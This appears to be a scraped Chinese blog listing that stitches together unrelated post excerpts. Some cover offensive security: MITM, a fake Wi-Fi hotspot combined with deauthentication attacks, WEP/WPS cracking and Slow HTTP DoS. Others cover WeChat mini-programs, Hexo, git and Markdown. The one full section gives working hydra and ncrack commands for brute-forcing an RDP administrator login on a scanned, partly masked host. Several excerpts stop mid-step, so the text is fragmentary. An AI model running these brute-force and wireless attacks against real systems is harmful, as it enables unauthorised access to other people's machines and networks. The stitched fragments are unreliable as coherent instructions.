中间人攻击也叫Man-In-The-Middle-Attack。

我假设你已经知道中间人攻击的基本概念，引用一段wikipedia：

集线器、交换机和路由器都是计算机网络设备，而且非常容易混淆。那么集线器、交换机和路由器有什么区别呢？

全世界，现在大约50%的网站没有使用SSL加密，天朝尤其多。

我们都知道通过HTTP发送的数据都是明文，没有使用任何加密，即使是在数据敏感的登录页面。

我这里使用的Kali Linux，它默认安装了WPScan。

在使用WPScan之前，先更新它的漏洞数据库：

Hydra是非常高效的网络登录破解工具，它可以对多种服务程序执行暴力破解（SSH、VNC等等）。

本帖介绍怎么创建假的wifi热点，然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包，使这些路由器瘫痪，强迫用户连接（或自动连接）我们创建的假wifi热点。

pdfcrack是破解PDF保护密码的Linux命令行工具。

安装pdfcrack

Debian系列：

# apt install pdfcrack

Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具，它的设计原理是要求服务器所有请求被完全接收后再进行处理。

RDP是远程桌面协议。

$ nmap your_target
Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CST
Nmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx)
Host is up (0.28s latency).
Not shown: 988 closed ports
PORT      STATE    SERVICE
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
3389/tcp  open     ms-wbt-server   # 这个是远程桌面端口
4444/tcp  filtered krb524
6667/tcp  filtered irc
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
49155/tcp open     unknown
49163/tcp open     unknown
Nmap done: 1 IP address (1 host up) scanned in 28.14 seconds

使用hydra暴力破解：

hydra -t 4 -V -l administrator -P /usr/share/wordlists/rockyou.txt rdp://your_target

-t = TASKS run TASKS number of connects in parallel (per host, default: 16) RDP set to maximum of 4.
-V = Verbose shows you the attempted passwords.
-l = Username
-P = Password list
rdp:// = Port 3389

使用ncrack暴力破解：

ncrack -p 3389 -v -user administrator -P /usr/share/wordlists/rockyou.txt 192.95.xx.xx

-p = Port number
-v = Verbose shows you any found passwords in realtime
-user = username
-P = Password list

远程桌面登录：

rdesktop your_target

来自wikipeida：

Wi-Fi保护设置（简称WPS，全称Wi-Fi Protected Setup）是一个无线网络安全标准，旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟（Wi-Fi Alliance）于2006年制定。

Kali Linux能做很多事，但是它主要以渗透测试及’破解wifi密码’闻名。

如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码

WEP是无线路由器最初广泛使用的一种加密方式，这种加密方式非常容易被破解。

目前很少有人使用wep加密方式，但是还是会有。

文本仅供学习交流。

我使用的系统是macbook pro 15：

安装aircrack-ng

使用homebrew安装，命令：

最近有个奇葩要求 要项目中的N行代码 申请专利啥的
然后作为程序员当然不能复制粘贴 用代码解决。。

小程序： 行家看看

年前，公司开发了微信小程序，我负责后端开发，其中遇到一些坑，分享一下

小程序语音录制和播放

1. 微信录音不能计时，需要自己计时
2. 录音文件是微信独有格式，只能微信本身播放，否则需要工具转换为Mp3等通用格式才可以
3. 录音播放不能直接用标签src引入，需要将语音文件下载到本地后才可以正常播放。
4. 录音播放没有播放完成的事件，需要自己计时

小程序视频录制和播放

1. 视频录制很费空间
2. 视频需要压缩再上传，否则会很卡，或者上传失败
3. 又拍云的视频处理文档是狗屎,直接问客服，否则处理回调不会成功
   目前就这些，想到了再写

我的博客主题是直接fork原作者的，所以当原作者更新之后，我要合并冲突，跟随更新
下面说一下简单的方法，算是自己做个笔记

使用Github托管hexo静态博客的优缺点

Hexo 是一个快速、简洁且高效的博客框架。Hexo 使用 Markdown（或其他渲染引擎）解析文章，在几秒内，即可利用靓丽的主题生成静态网页。

也就是说你用WP做博客已经OUT了，现在流行纯静态博客

本文献给对git很迷茫的新手，注意是新手，但至少会点基本操作，有点基本概念的新手，我不会从怎么用github和git是什么开始讲的。如果作为新手你看书又看不进去，原理又太复杂，又没有直接了当告诉我们怎么给项目贡献代码，和项目同步代码的大体流程。于是我快速写了这么个东西。一来整理下自己混乱的思路，二来想号召大家一起用git开发点东西，可是好几个同鞋只会寂寞的给自己push。

今天看到一个朋友在github上面的issue
大概问题就是怎么在不同的电脑上面使用
git有个这么个东西Submoudle中文叫做子模块

Markdown是_什么_？

Markdown是一种轻量级标记语言，它以纯文本形式(易读、易写、易更改)编写文档，并最终以HTML格式发布。